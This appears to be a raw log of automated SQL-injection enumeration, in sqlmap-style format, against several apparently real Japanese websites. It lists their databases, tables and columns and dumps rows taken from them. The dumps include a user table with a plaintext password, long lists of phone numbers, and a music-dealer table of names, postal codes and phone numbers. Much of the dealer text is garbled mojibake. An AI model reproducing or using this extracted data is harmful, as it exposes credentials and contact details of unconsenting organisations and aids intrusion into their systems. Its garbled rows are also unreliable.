| ???-???- |
| -- |
| -- |
| 089- 974-8065 |
| -- |
| 03-3656-2324 |
| 04-7193-0022 |
| -- |
| - - |
| -- |
| -- |
| 04-7138-3339 |
| - - |
| -- |
| 03-6806-2830 |
| 049-274-3251 |
| 042-567-3030 |
| -- |
| -- |
| 096-273-2679 |
| -- |
| 047-480-2700 |
| -- |
| 0795-32-4112 |
| 03-5988-3878 |
| 043-298-6663 |
| 058-324-6548 |
| -- |
| 045-960-1691 |
| 072-339-1761 |
| -- |
| 03-5678-5388 |
| 03-5674-1160 |
| 03-3565-3966 |
| 047-484-0231 |
| 043-257-1551 |
| 0467-55-2445 |
| 042-794-7771 |
| -- |
| 048-467-6084 |
| 048-776-4712 |
| 048-729-1077 |
| 0564-58-7090 |
| 0829-34-3522 |
| -- |
| 0774-64-6467 |
| 055-080-0704 |
| 03-5686-8155 |
| 0425-69-2354 |
| 03-5661-3837 |
| 042-689-6178 |
| 050-1538-4982 |
| 03-3877-2387 |
| 099-238-7478 |
| 026-283-7002 |
| 0270-23-9371 |
| 0790-66-4369 |
| 096-388-1894 |
| 059-363-2400 |
| 0172-26-3339 |
| 011-823-9000 |
| 022-361-7476 |
| 04-2935-2155 |
| 022-771-8651 |
| 011-851-3022 |
| 045-825-9782 |
| 0574-25-9050 |
| 0467-73-4500 |
| -- |
| 042-703-6671 |
| 046-236-6331 |
| -- |
| 0568-24-1102 |
| 0297-63-2080 |
| 011-787-4649 |
| 043-214-0561 |
| 0794-63-4894 |
| 0480-31-9064 |
| 042-682-4415 |
| 048-532-1006 |
| 072-843-4970 |
| -- |
| 042-532-7324 |
| 027-320-2678 |
| 011-206-4470 |
| 096-388-2396 |
| 03-3883-9983 |
| 024-539-7372 |
| 086-209-0666 |
| 052-621-7088 |
| 053-441-8508 |
| 042-730-3923 |
| -- |
| -- |
| 0748-72-7768 |
| -- |
| 0725-39-2880 |
| -- |
| 03-5668-5676 |
| 0797-20-9834 |
| 0568-52-0789 |
| 084-945-0858 |
| 092-940-1333 |
| 043-216-0005 |
| 092-513-7302 |
| 0544-58-0150 |
| -- |
| 0297-61-6161 |
| 0297-77-1616 |
| 0285-55-1718 |
| 093-647-0708 |
| 072-883-9000 |
| -- |
| 042-777-5122 |
| 0237-86-1952 |
| 048-489-6656 |
| 03-5661-3837 |
| 042-777-0456 |
| 0596-53-0072 |
| 055-986-6117 |
| 043-236-1975 |
| 046-244-1283 |
| 06-6787-9018 |
| 052-411-3833 |
| 078-685-3511 |
| 0285-82-4766 |
| 042-678-7326 |
| 0968-53-3672 |
| 0463-37-4418 |
| 045-590-6232 |
| 04-2965-6085 |
| 048-660-5202 |
| -- |
| 082-426-1208 |
| -- |
| 079-434-4801 |
| 0586-43-8050 |
| 086-956-0166 |
| -- |
| 048-477-0098 |
| 048-449-0331 |
| -- |
| 03-3723-2355 |
| 011-748-7447 |
| 092-940-1889 |
| 0575-24-9841 |
| 045-913-3443 |
| 042-761-5743 |
| -- |
| 072-234-1410 |
| 072-260-7011 |
| 0833-47-2027 |
| -- |
| 0476-76-7544 |
| 078-969-2556 |
| -- |
| 022-797-4612 |
| 046-254-1293 |
| 04-2937-6664 |
| 048-422-3244 |
| 048-851-2181 |
| 0493-53-4144 |
| 0297-61-3156 |
| 027-212-6987 |
| 011-775-1207 |
| 03-3641-6265 |
| 047-392-7797 |
| 03-3745-6778 |
| -- |
| 048-957-8900 |
Database: www_kaizousha_com
[22 tables]
| adcount |
| baner |
| car_viewcount |
| car_viewcount_old |
| carcate |
| caropttbl |
| carpartscate |
| carpartssubcate |
| carpartstbl |
| carshoptbl |
| cartbl |
| gallery |
| l_category_master |
| linkcate |
| linktbl |
| m_category_master |
| mastercardb |
| search_field |
| topics |
| tuneshop |
| usertbl |
| yougo |
Database: www_kaizousha_com
[22 tables]
| adcount |
| baner |
| car_viewcount |
| car_viewcount_old |
| carcate |
| caropttbl |
| carpartscate |
| carpartssubcate |
| carpartstbl |
| carshoptbl |
| cartbl |
| gallery |
| l_category_master |
| linkcate |
| linktbl |
| m_category_master |
| mastercardb |
| search_field |
| topics |
| tuneshop |
| usertbl |
| yougo |
Database: www_kaizousha_com
Table: carshoptbl
[27 columns]
| Column | Type |
| access_comm | text |
| common_comm | text |
| id | int(11) |
| qrcode | varchar(50) |
| regdate | date |
| shopadd | varchar(150) |
| shoparea | varchar(50) |
| shopcomm | text |
| shopdesc | varchar(255) |
| shopfax | varchar(100) |
| shophday | varchar(100) |
| shopid | int(11) |
| shopido | varchar(20) |
| shopimg | varchar(50) |
| shopimg01 | varchar(50) |
| shopimg02 | varchar(50) |
| shopimg03 | varchar(50) |
| shopkeido | varchar(20) |
| shopkeywords | varchar(200) |
| shopmail | varchar(100) |
| shopname | varchar(100) |
| shoptel | varchar(100) |
| shopurl | varchar(255) |
| time_AM | varchar(20) |
| time_PM | varchar(20) |
| time_rsv | varchar(150) |
| titleimg | varchar(50) |
available databases [1]:
[*] infosecw_swg
available databases [2]:
[*] alljapan_db
[*] information_schema
Database: alljapan_db
[9 tables]
| tb_banner |
| tb_history |
| tb_link |
| tb_master |
| tb_news |
| tb_shiai |
| tb_taikai |
| tb_top_review |
| tb_tour |
Database: alljapan_db
Table: tb_banner
[11 columns]
| Column | Type |
| del_flg | int(11) |
| id | int(11) |
| img1 | varchar(100) |
| img2 | varchar(100) |
| in_date | datetime |
| sortno | int(11) |
| target | int(11) |
| text | varchar(100) |
| type | varchar(10) |
| up_date | datetime |
| url | varchar(200) |
Database: alljapan_db
Table: tb_history
[10 columns]
| Column | Type |
| del_flg | int(11) |
| id | int(11) |
| img1 | varchar(50) |
| img1_text | varchar(100) |
| in_date | datetime |
| name | varchar(50) |
| sortno | int(11) |
| text1 | text |
| text2 | text |
| up_date | datetime |
Database: alljapan_db
Table: tb_link
[10 columns]
| Column | Type |
| del_flg | int(11) |
| id | int(11) |
| img1 | varchar(50) |
| in_date | datetime |
| sortno | int(11) |
| target | int(11) |
| text | varchar(100) |
| type | varchar(10) |
| up_date | datetime |
| url | varchar(200) |
Database: alljapan_db
Table: tb_master
[37 columns]
| Column | Type |
| birth | date |
| birth_fumei | int(11) |
| blog_text | varchar(50) |
| blog_url | varchar(100) |
| comefrom | varchar(100) |
| debut | varchar(100) |
| del_flg | int(11) |
| gettitle | varchar(200) |
| height | varchar(20) |
| id | int(11) |
| img1 | varchar(100) |
| img10 | varchar(100) |
| img11 | varchar(100) |
| img12 | varchar(100) |
| img13 | varchar(100) |
| img14 | varchar(100) |
| img2 | varchar(100) |
| img3 | varchar(100) |
| img4 | varchar(100) |
| img5 | varchar(100) |
| img6 | varchar(100) |
| img7 | varchar(100) |
| img8 | varchar(100) |
| img9 | varchar(100) |
| in_date | datetime |
| intro_text | text |
| kana | varchar(100) |
| killer1_text | varchar(50) |
| killer2_text | varchar(50) |
| killer3_text | varchar(50) |
| name | varchar(100) |
| profile | varchar(100) |
| sortno | int(11) |
| themesong | varchar(50) |
| twitter_id | varchar(100) |
| up_date | datetime |
| weight | varchar(20) |
Database: alljapan_db
Table: tb_news
[14 columns]
| Column | Type |
| date | date |
| del_flg | int(11) |
| id | int(11) |
| img1 | varchar(50) |
| img1_text | varchar(100) |
| img2 | varchar(100) |
| img3 | varchar(100) |
| img4 | varchar(100) |
| img5 | varchar(100) |
| in_date | datetime |
| text | text |
| title | text |
| type | int(11) |
| up_date | datetime |
Database: alljapan_db
Table: tb_shiai
[31 columns]
| Column | Type |
| A_finish1 | int(11) |
| A_finish2 | int(11) |
| A_finish3 | int(11) |
| A_finish4 | int(11) |
| A_finish5 | int(11) |
| A_master1 | int(11) |
| A_master2 | int(11) |
| A_master3 | int(11) |
| A_master4 | int(11) |
| A_master5 | int(11) |
| B_finish1 | int(11) |
| B_finish2 | int(11) |
| B_finish3 | int(11) |
| B_finish4 | int(11) |
| B_finish5 | int(11) |
| B_master1 | int(11) |
| B_master2 | int(11) |
| B_master3 | int(11) |
| B_master4 | int(11) |
| B_master5 | int(11) |
| comment | text |
| del_flg | int(11) |
| finishhold | varchar(100) |
| id | int(11) |
| in_date | datetime |
| name | varchar(100) |
| shiai_no | int(11) |
| taikai_id | int(11) |
| time | varchar(50) |
| tour_id | int(11) |
| up_date | datetime |
Database: alljapan_db
Table: tb_taikai
[18 columns]
| Column | Type |
| acc | varchar(200) |
| addr | varchar(100) |
| date | varchar(100) |
| del_flg | int(11) |
| id | int(11) |
| img1 | varchar(50) |
| in_date | datetime |
| mapurl | varchar(200) |
| name | varchar(100) |
| next_taikai | int(11) |
| now_taikai | int(11) |
| num | varchar(20) |
| place | varchar(100) |
| result_flg | int(11) |
| start_time | varchar(50) |
| tel | varchar(20) |
| tour_id | int(11) |
| up_date | datetime |
Database: alljapan_db
Table: tb_top_review
[13 columns]
| Column | Type |
| del_flg | int(11) |
| end_date | date |
| id | int(11) unsigned |
| img1 | varchar(255) |
| in_date | datetime |
| sortno | int(11) |
| start_date | date |
| text | varchar(255) |
| title | varchar(255) |
| up_date | datetime |
| url1 | varchar(255) |
| url2 | varchar(255) |
| youtube1 | varchar(255) |
Database: alljapan_db
Table: tb_tour
[13 columns]
| Column | Type |
| bnr_flg | int(11) |
| date | varchar(100) |
| del_flg | int(11) |
| gaiyo | text |
| id | int(11) |
| img1 | varchar(100) |
| in_date | datetime |
| name | varchar(100) |
| next_tour | int(11) |
| now_tour | int(11) |
| s_date | date |
| special_tour | int(11) |
| up_date | datetime |
available databases [4]:
[*] information_schema
[*] kir014622_hamatech
[*] kir014622_hhkyoten
[*] test
Database: kir014622_hamatech
[11 tables]
| Mst_Common |
| Mst_Expo |
| Mst_ExpoMemo |
| Mst_Number |
| Mst_User |
| Trn_Exhibitor |
| Trn_ExhibitorMemo |
| Trn_Exhibitor_Disp |
| Trn_Exhibitor_Disp2011 |
| Trn_Exhibitor_Disp2012 |
| Trn_Visitor |
Database: kir014622_hhkyoten
[44 tables]
| mt_asset |
| mt_asset_meta |
| mt_association |
| mt_author |
| mt_author_meta |
| mt_author_summary |
| mt_blog |
| mt_blog_meta |
| mt_category |
| mt_category_meta |
| mt_ckeditor_field |
| mt_comment |
| mt_comment_meta |
| mt_config |
| mt_entry |
| mt_entry_meta |
| mt_entry_rev |
| mt_entry_summary |
| mt_field |
| mt_fileinfo |
| mt_ipbanlist |
| mt_log |
| mt_notification |
| mt_objectasset |
| mt_objectscore |
| mt_objecttag |
| mt_permission |
| mt_placement |
| mt_plugindata |
| mt_role |
| mt_session |
| mt_tag |
| mt_tbping |
| mt_tbping_meta |
| mt_template |
| mt_template_meta |
| mt_template_rev |
| mt_templatemap |
| mt_touch |
| mt_trackback |
| mt_ts_error |
| mt_ts_exitstatus |
| mt_ts_funcmap |
| mt_ts_job |
Database: kir014622_hamatech
Table: Mst_User
[7 columns]
| Column | Type |
| Delete_Flag | int(11) |
| ID | int(11) |
| Mod_Date | varchar(14) |
| Reg_Date | varchar(14) |
| User_Code | varchar(50) |
| User_Flag | int(11) |
| User_Password | varchar(20) |
Database: kir014622_hamatech
Table: Mst_User
[1 entry]
| Delete_Flag | ID | Mod_Date | Reg_Date | User_Code | User_Flag | User_Password |
| 0 | 1 | NULL | NULL | 0000 | 0 | 12345 |
Database: kir014622_hamatech
Table: Mst_Number
[1 entry]
| Exhibitor_Date | Exhibitor_SeqNo | ID |
| 20120131 | 2 | 1 |
available databases [6]:
[*] information_schema
[*] klug
[*] klug_dev
[*] klug_etf
[*] klug_test
[*] test
Database: klug
[80 tables]
| abn_news |
| admin |
| book_category |
| book_entry |
| book_replacement |
| cfd_dailycache |
| cfd_fxnews_count |
| cfd_fxnews_ranking |
| cfd_monthlycache |
| cfdcache |
| cfdlistcache |
| company |
| country |
| dailycache |
| enquete |
| enquete_option |
| enquete_result |
| enquete_tag |
| event |
| forecast |
| fxcache |
| fxcompany |
| fxinst |
| fxlistcache |
| fxnews |
| fxnews20090818 |
| fxnews_count |
| fxnews_ranking |
| fxnews_tag |
| fxrate |
| glossary |
| glossary_category |
| gta_ftp_fxnews |
| keyword |
| marketnews |
| member |
| monthlycache |
| mt_asset |
| mt_association |
| mt_author |
| mt_blog |
| mt_category |
| mt_comment |
| mt_config |
| mt_entry |
| mt_field |
| mt_fileinfo |
| mt_ipbanlist |
| mt_log |
| mt_notification |
| mt_objectasset |
| mt_objectscore |
| mt_objecttag |
| mt_permission |
| mt_placement |
| mt_plugindata |
| mt_role |
| mt_session |
| mt_tag |
| mt_tbping |
| mt_template |
| mt_templatemap |
| mt_trackback |
| mt_ts_error |
| mt_ts_exitstatus |
| mt_ts_funcmap |
| mt_ts_job |
| overture |
| sortcol |
| spotpr |
| swappoint |
| swappoint0820 |
| swappoint_value |
| swappoint_value0820 |
| tag |
| v_cfdnews |
| v_enquete_tag |
| v_fxnews_tag |
| yucasee_articles |
| yucasee_articles_old |
Database: `klug_dev
[58 tables]
| abn_news |
| admin |
| book_category |
| book_entry |
| book_replacement |
| company |
| country |
| enquete |
| enquete_option |
| enquete_result |
| enquete_tag |
| event |
| forecast |
| fxcompany |
| fxinst |
| fxnews |
| fxnews_count |
| fxnews_ranking |
| fxnews_tag |
| fxrate |
| glossary |
| glossary_category |
| member |
| mt_asset |
| mt_association |
| mt_author |
| mt_blog |
| mt_category |
| mt_comment |
| mt_config |
| mt_entry |
| mt_field |
| mt_fileinfo |
| mt_ipbanlist |
| mt_log |
| mt_notification |
| mt_objectasset |
| mt_objectscore |
| mt_objecttag |
| mt_permission |
| mt_placement |
| mt_plugindata |
| mt_role |
| mt_session |
| mt_tag |
| mt_tbping |
| mt_template |
| mt_templatemap |
| mt_trackback |
| mt_ts_error |
| mt_ts_exitstatus |
| mt_ts_funcmap |
| mt_ts_job |
| swappoint |
| swappoint_value |
| tag |
| v_enquete_tag |
| v_fxnews_tag |
Database: klug_etf`
[39 tables]
| mt_asset |
| mt_asset_meta |
| mt_association |
| mt_author |
| mt_author_meta |
| mt_blog |
| mt_blog_meta |
| mt_category |
| mt_category_meta |
| mt_comment |
| mt_comment_meta |
| mt_config |
| mt_entry |
| mt_entry_meta |
| mt_field |
| mt_fileinfo |
| mt_ipbanlist |
| mt_log |
| mt_notification |
| mt_objectasset |
| mt_objectscore |
| mt_objecttag |
| mt_permission |
| mt_placement |
| mt_plugindata |
| mt_role |
| mt_session |
| mt_tag |
| mt_tbping |
| mt_tbping_meta |
| mt_template |
| mt_template_meta |
| mt_templatemap |
| mt_touch |
| mt_trackback |
| mt_ts_error |
| mt_ts_exitstatus |
| mt_ts_funcmap |
| mt_ts_job |
Database: klug_dev
Table: member
[19 columns]
| Column | Type |
| bank_rate | varchar(255) |
| bias | int(11) |
| country_id | int(11) |
| created | datetime |
| date | varchar(255) |
| delete | tinyint(1) |
| division | varchar(255) |
| id | int(11) |
| interest | varchar(255) |
| memo | varchar(255) |
| message_link | varchar(255) |
| minutes_link | varchar(255) |
| modified | timestamp |
| modify | int(11) |
| point | text |
| predict | varchar(255) |
| sort_id | int(11) |
| valid | tinyint(1) |
| year | int(11) |
Database: klug_dev
Table: member
[13 entries]
| bank_rate | bias | country_id | created | date | delete | division | id | interest | memo | message_link | minutes_link | modified | modify | point | predict | sort_id | valid | year |
| 4.00% | 1 | 1 | 2008-10-21 07:57:49 | 1/21 | NULL | 8-1 | 1 | 3.75% | NULL | | | 2008-10-31 11:35:20 | 2 | ??????????????????
???????????????? | N/A | 1 | 1 | 2008 |
| 3.25% | 1 | 1 | 2008-10-21 08:52:57 | 1/29-30 | NULL | 9-1 | 2 | 3.00% | NULL | | | 2008-10-31 11:35:13 | 2 | ????????????
???????????????? | 3.00% | 2 | 1 | 2008 |
| 2.50% | 1 | 1 | 2008-10-21 08:54:24 | 3/18 | NULL | 8-2 | 3 | 2.25% | NULL | | | 2008-10-31 11:35:05 | 2 | ????????????
???????????? | 2.25% | 3 | 1 | 2008 |
| 2.25% | 4 | 1 | 2008-10-21 08:55:46 | 4/29-30 | NULL | 8-2 | 4 | 2.00% | NULL | | | 2008-10-31 11:34:57 | 3 | ????????????????????
??????? | 2.00% | 4 | 1 | 2008 |
| 2.50% | 2 | 1 | 2008-10-21 08:56:56 | 6/24-25 | NULL | 9-1 | 5 | 2.00% | NULL | | | 2008-10-21 08:56:56 | 3 | ???????????????????
??????????? | 2.00% | 5 | 1 | 2008 |
| 2.25% | 3 | 1 | 2008-10-21 08:58:06 | 8/5 | NULL | 10-1 | 6 | 2.00% | NULL | | | 2008-10-31 11:34:51 | 3 | NULL | 2.00% | 6 | 1 | 2008 |
| 2.25% | 3 | 1 | 2008-10-21 08:59:25 | 9/16 | NULL | NULL | 7 | 2.00% | NULL | | | 2008-10-31 11:34:44 | 3 | NULL | 2.00% | 7 | 1 | 2008 |
| NULL | 2 | 3 | 2008-10-21 11:07:03 | 1/10 | NULL | NULL | 8 | 4.00% | NULL | | NULL | 2008-10-24 16:18:10 | 3 | ?????????? | 4.00% | 8 | 1 | 2008 |
| NULL | 3 | 3 | 2008-10-21 11:07:59 | 2/7 | NULL | NULL | 9 | 4.00% | NULL | | NULL | 2008-10-24 16:17:56 | 3 | ???????????? | 4.00% | 9 | 1 | 2008 |
| NULL | 2 | 3 | 2008-10-21 11:08:45 | 3/6 | NULL | NULL | 10 | 4.00% | NULL | | NULL | 2008-10-24 16:17:39 | 3 | NULL | 4.00% | 10 | 1 | 2008 |
| NULL | 2 | 3 | 2008-10-21 11:09:21 | 4/10 | NULL | NULL | 11 | 4.00% | NULL | | NULL | 2008-10-24 16:17:22 | 3 | NULL | 4.00% | 11 | 1 | 2008 |
| NULL | 2 | 3 | 2008-10-21 11:10:00 | 5/8 | NULL | NULL | 12 | 4.00% | NULL | | NULL | 2008-10-24 16:17:07 | 3 | NULL | 4.00% | 12 | 1 | 2008 |
| NULL | 2 | 3 | 2008-10-21 11:10:56 | 6/5 | NULL | NULL | 13 | 4.00% | NULL | | NULL | 2008-10-24 16:16:47 | 3 | ?7??????????
??????????? | 4.00% | 13 | 1 | 2008 |
available databases [5]:
[*] acms
[*] pgsql
[*] postgres
[*] template0
[*] template1
Database: public
[27 tables]
| ah_manual |
| ah_news |
| ah_product |
| ah_product_cat |
| dealer |
| dist |
| download |
| event |
| faq |
| faq_cat |
| form |
| form_enq |
| man_rank |
| manual |
| manual2 |
| news |
| news_cat |
| onstudio |
| product |
| product_cat |
| psu_dist |
| psu_manufacturer |
| psu_piano |
| recruit |
| rockbag_product |
| seminar |
| tbox_news |
Database: public
Table: dealer
[17 columns]
| Column | Type |
| dlr_adr1 | varchar |
| dlr_adr2 | varchar |
| dlr_cat | varchar |
| dlr_datecrt | date |
| dlr_datemod | date |
| dlr_furigana | varchar |
| dlr_mail | varchar |
| dlr_name | varchar |
| dlr_postal | varchar |
| dlr_pref | int4 |
| dlr_rank | varchar |
| dlr_tel1 | varchar |
| dlr_tel2 | varchar |
| dlr_txt1 | text |
| dlr_txt2 | text |
| dlr_url | varchar |
| id | int4 |
Database: public
Table: dealer
[93 entries]
| dlr_adr1 | dlr_adr2 | dlr_cat | dlr_datecrt | dlr_datemod | dlr_furigana | dlr_mail | dlr_name | dlr_postal | dlr_pref | dlr_rank | dlr_tel1 | dlr_tel2 | dlr_txt1 | dlr_txt2 | dlr_url | id |
| \8eD?y\8es\92\86?\9b?\e6\93\ec\82P\8f?\90シ\82R?|\82R | ?p???R?f???G\82UF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed (\8a?) \8eD?y\83p???R\93X | 060-0061 | 1 | 0 | 011-214-2391 | NULL | NULL | NULL | | 1 |
| \90?\91?\8es\90\c2\97t?\e6?\86?\9b\82Q\81|\82S\81|\82Q | \90V\90\af\93ー?J???`?F\81D\82T\90\e5\91\e4\93X?a\82P\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a\94)\90V\90\af\93ー\81@???b?N?C?\93\90?\91\e4\93X | 980-0021 | 4 | 0 | 022-215-1175 | NULL | NULL | NULL | NULL | 2 |
| \90?\91\e4\8es\90\c2\97t?\e6?\86?\9b\82S\81|\82P\81|\82Q\82U | ?C\81[?r\81[?\93\83Y\82S\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a??@(\8a?)\81@\90?\91\e4\93X | 980-0021 | 4 | 0 | 022-264-9333 | NULL | NULL | NULL | | 3 |
| \95\9f\93?\8cァ\95?\93?\8es?h?\ac\82P\82P\81|\82Q\82T | \95\9f\93?\82`\82w\82b\81@\82U\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?\86\81[\81E???\93?~??\81[?W?b?N | 960-8031 | 7 | 0 | 024-533-9033 | NULL | NULL | NULL | NULL | 4 |
| ?\e0\91??s\90???\8fo?\ac?S?|\82P\82R | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?シ?リ?\ae\81@?o?\93?o?\93\90????u\93X | 921-8116 | 19 | 0 | 076-280-6633 | NULL | NULL | NULL | | 5 |
| \8a?\95\8c\8es?\be\93?\90ク?リ\82R\81|\82T\81|\82X | \90\c2?リ?r??\82P\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?~??\81[?W?b?N?n?E?X?t?\8c???Y | 501-0112 | 22 | 0 | 058-253-0224 | NULL | NULL | NULL | | 6 |
| ?F\93s?{\8es?n?\ea?\ca\82\e8\82R?|\82P\81|\82P | ?F\93s?{?p???R\82X\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed\81@(\8a?)\81@?F\93s?{\93X | 320-0026 | 13 | 0 | 028-611-2179 | NULL | NULL | NULL | | 7 |
| \90?\8cヒ\8es\92\86\8cエ?\ac?\9a\90シ\82P\82R\82T | ?C?I?\93\83\82\81[??\90??ヒ\93\e0\8cエ\82Q\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (??)\82?\82\97\82?\81|\82\86\82???\82?\81@?C?I?\93?\82\81[??\90?\8cヒ\93\e0\8cエ\93X | 319-0305 | 12 | 0 | 029-259-1519 | NULL | NULL | NULL | | 8 |
| \82\c2\82\ad\82ホ\8es\8c??\c8\82R\81|\82P\82Q\81|\82R | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | ?~??\81[?W\83b?N?v???\93?g\81@\82\c2?ュ\82ホ\93X | 305-0031 | 12 | 0 | 0298-56-1366 | NULL | NULL | NULL | NULL | 9 |
| \88\f3\90シ\8es\8cエ\82P\81|\82Q | ?r?b?N?z?b\83v?K\81[?f?\93?\82\81[??\88\f3\90シ\82P\82e\82P\82O\82R\82O | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\82?\82\97\82?\81|\82\86\82?\82?\82?\81@\88\f3\90シ?r?b\83N?z?b?v\93X | 270-1335 | 11 | 0 | 0476-40-6949 | NULL | NULL | NULL | | 10 |
| ?\90\8es?\90\82P\81|\82Q\81|\82R\82P | \90V\90\af\93\b0?J???`?F\82T\81D\82Q\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90V\90ッ\93ー\81@???b?N?C?\93?\90\93X | 277-0005 | 11 | 0 | 04-7164-8770 | NULL | NULL | NULL | NULL | 11 |
| ?シ\8cヒ\8es?シ\8cヒ\82P\82P\82V\82S\81|\82P | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\88ノ?。\8ay\8a\ed\81@?~??\81[\83W?b?N?o?\93?N\81@?シ\8cヒ | 271-0092 | 11 | 0 | 0473-68-1161 | NULL | NULL | NULL | NULL | 12 |
| \8es\90\ec\8es?S?\82\82P\81|\82P\81|\82P | ?R???g?\93?v???U\82R\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91\ba\8ay\8a\ed\81@(\8a?)\81@\83R???g???v??\83U\93X | 272-0015 | 11 | 0 | 047-370-1212 | NULL | NULL | NULL | | 13 |
| \91D?エ\8es\91O\8cエ\90\bc\82Q\81|\82P\82W\81|\82P | ?p???R\82`\8a\d9\81@\82T\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed\81@(\8a\94)\81@?テ?c?タ?p???R\93X | 274-0825 | 11 | 0 | 047-474-7700 | NULL | NULL | NULL | | 14 |
| ?K\8eu??\8es?J?テ\82V\81|\82V\81|\82P | \82s?\88\82?\81@\82a\82\8c\82?\82?\82? \82P\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90\ce?エ\8ay\8a\ed\93X ?テ\93c\8f\c0\93X | 275-0026 | 11 | 0 | NULL | NULL | NULL | NULL | | 15 |
| \90??z\8es?e\93c\92\ac\82S\81|\82Q | \90??z\82?\82?\82?\82?\81@\82S\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?ホ?エ?y\8a\ed\93X \90??z\93X | 350-1122 | 10 | 0 | 049-228-1484 | NULL | NULL | NULL | | 16 |
| \82\b3\82\a2\82\bd\82ワ?s\91??{?\e6?{?\ac106 | \91??{???t?g\82UF | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay\8a\ed\81@(\8a?)\81@\91??{\83??t?g\93X | 330-0802 | 10 | 0 | 048-648-6660 | NULL | NULL | NULL | | 17 |
| \95\90\91\a0?コ\8eR\8es?|\82P\81|\82P\81|\82R\81|\82R\82O\82O\82X | ?C?I?\93?\82\81[??\82\de\82\b3\82\b5\91コ\8eR?~??\81[\82R\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a\94)\82??\97\82?\81|\82\86\82?\82?\82\85\81@\82\de\82\b3\82\b5\91コ?R?~?\85\81[\93X | 208-0022 | 8 | 0 | 042-590-2569 | NULL | NULL | NULL | | 18 |
| \95\90\91\a0\96?\8es?g?ヒ\8e\9b\82P\81|\82S\81|\82P\82W | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90V\90\af\93ー\81@???b?N?C?\93?g?ヒ\8e\9b\93X | 180-0004 | 8 | 0 | 0422-23-2311 | NULL | NULL | NULL | NULL | 19 |
| \97ァ\90?\8es?\8c?\ac\82Q\81|\82P\82P\81|\82Q | \82e\82q\82n\82l?\86\95\90\82V\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90V\90\af?ー\81@?\8d?b?N?C?\93?\a7??\93X | 190-0012 | 8 | 0 | 0425-27-6919 | NULL | NULL | NULL | NULL | 21 |
| \97ァ\90?\8es?\8c?\ac\82Q\81|\82V\81|\82P\82V | \97ァ\90?\82?\82?\82\84?? \82S\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90ホ?エ\8ay\8a\ed\93X \97ァ\90?\93X | 190-0012 | 8 | 0 | 042-528-1484 | NULL | NULL | NULL | | 22 |
| ?\ac?c\8es\8cエ?\ac\93c\82S\81|\82P\81|\82P\82V | ?~\81[?i?\ac\93c\82a\82P\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | \93?\91コ\8ay?\ed(\8a?)\81@?~\81[?i?\ac\93c\93X | 194-0013 | 8 | 0 | 042-710-6088 | NULL | NULL | NULL | | 23 |
| ?\ac\93c\8es\8cエ?\ac\93c\82U\81|\82U\81|\82P\82S | ?\ac\93c?W?\87\83?\83i\82a\82P\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90ホ?エ\8ay\8a\ed\93X ?\ac\93c?W?????i\93X | 194-0013 | 8 | 0 | 042-729-1484 | NULL | NULL | NULL | | 24 |
| ?a?J?\e6\90_\93?\82P\81|?W\81|\82P\82W | ?N\83I?\8a?A\90_\93??t???b?c1F | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | Rock oN Company | 150-0041 | 8 | 0 | 03-3477-1756 | NULL | NULL | NULL | | 25 |
| \93\8c\8b?\93s?a?J\8b\e6\93\b9\8cコ?\e2\82Q\81|\82P\82O\81|\82V | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\83\84?}?n?~??\81[?W?b?N\93\8c??\81@?\84?}?n?a?J\93X | 150-0043 | 8 | 0 | 03-3476-5441 | NULL | NULL | NULL | | 26 |
| ?a?J\8b\e6?F\93c\90??\ac\82R\82P\81|\82Q | ?a?J\82a\82d?`\82l\81@\82Q\82e | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)\90ホ?エ\8ay\8a\ed\93X ?a?J\93X | 150-0042 | 8 | 0 | 03-3770-1484 | NULL | NULL | NULL | | 27 |
| ?a?J?\e6?F\93c\90??\ac\82P?P\81|\82P\82P | ??\8c\f5?r???{\8a\d9\82Q\82e | 0010000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | Disc Jam?a?J?V\83X?R\93X | 150-0042 | 8 | 0 | 03-3770-6699 | NULL | NULL | NULL | NULL | 86 |
| ?a?J?\e6?\f7\8bu?\ac\82P\82U\81|\82P\82Q | NULL | 1110000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?~??\81[?W?b?N???\93?h\81@KEY\93\8c??\81@?a?J\93X | 150-0031 | 8 | 0 | 03-3463-0606 | NULL | NULL | NULL | | 28 |
| ?a?J?\e6?\f7?u?\ac\82Q\82S\81|\82Q | \91\e6\82R\95x?m?\a4\8e??r??\82R\82e | 0010000000 | 2009-09-24 | 2009-09-24 | NULL | NULL | (\8a?)?r\95?\8ay\8a\ed\93X\81@POWER DJ's\81@?a?J\93X | 150-0031 | 8 | 0 | 03-3496-6988 | NULL | NULL | NULL | | 87 |
